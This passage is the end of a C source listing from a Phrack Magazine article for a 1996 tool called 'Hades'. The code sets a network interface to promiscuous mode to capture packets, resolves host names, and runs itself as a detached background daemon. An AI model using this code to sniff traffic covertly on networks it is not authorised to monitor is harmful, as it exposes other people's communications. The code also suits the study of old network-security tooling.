      		perror("SOCK_PACKET allocation problems");	/* getting link-layer */
      		exit(1);					/* packets */
   	}
	strcpy(ifr.ifr_name,device);				
   	if((ioctl(fd,SIOCGIFFLAGS,&ifr))<0){			/* Get the device info */
      		perror("Can't get device flags");
      		close(fd);
      		exit(1);
   	}
   	ifr.ifr_flags|=IFF_PROMISC;				/* Set promiscuous mode */
   	if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){			/* Set flags */
		perror("Can't set promiscuous mode");
   		close(fd);
		exit(1);
	}
	return(fd);
}

/*
 *	Network byte order into IP address
 */

char *hostLookup(in)
unsigned long in;
{
 
   	char hostname[BUFSIZE];
   	struct in_addr addr;
   	struct hostent *hostEnt;
   
	bzero(&hostname,sizeof(hostname));
	addr.s_addr=in;
   	hostEnt=gethostbyaddr((char *)&addr, sizeof(struct in_addr),AF_INET);
   	if(!hostEnt)strcpy(hostname,inet_ntoa(addr));
   	else strcpy(hostname,hostEnt->h_name);
   	return(strdup(hostname));
}
 
/*
 *      Simple daemonizing procedure.
 */   

void shadow(void){

        int fd,fs;
        extern int errno;
     	char werd[]={"\n\n\n\nHades is a Guild Corporation Production.  c.1996\n\n"}; 

        signal(SIGTTOU,SIG_IGN);        /* Ignore these signals */
        signal(SIGTTIN,SIG_IGN);
        signal(SIGTSTP,SIG_IGN);
	printf(werd);

        switch(fork()){
               case 0:                 /* Child */
                        break;
                default:        
                        exit(0);        /* Parent */
                case -1:
                        fprintf(stderr,"Forking Error\n");
                        exit(1);
        }
        setpgrp();
        if((fd=open("/dev/tty",O_RDWR))>=0){
                ioctl(fd,TIOCNOTTY,(char *)NULL);
                close(fd);
        }
        /*for(fd=0;fd<NOFILE;fd++)close(fd);*/
        errno=0;
        chdir("/");
        umask(0);
}

/*
 *      Keeps processes from zombiing on us...
 */
        
static void reaper(signo)
int signo;
{
        pid_t pid;
        int sys;

        pid=wait(&sys); 
        signal(SIGCHLD,reaper);
        return;
}


-------------------------------8<-------cut-me-loose--------------------------

EOF

[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2024, Phrack Magazine.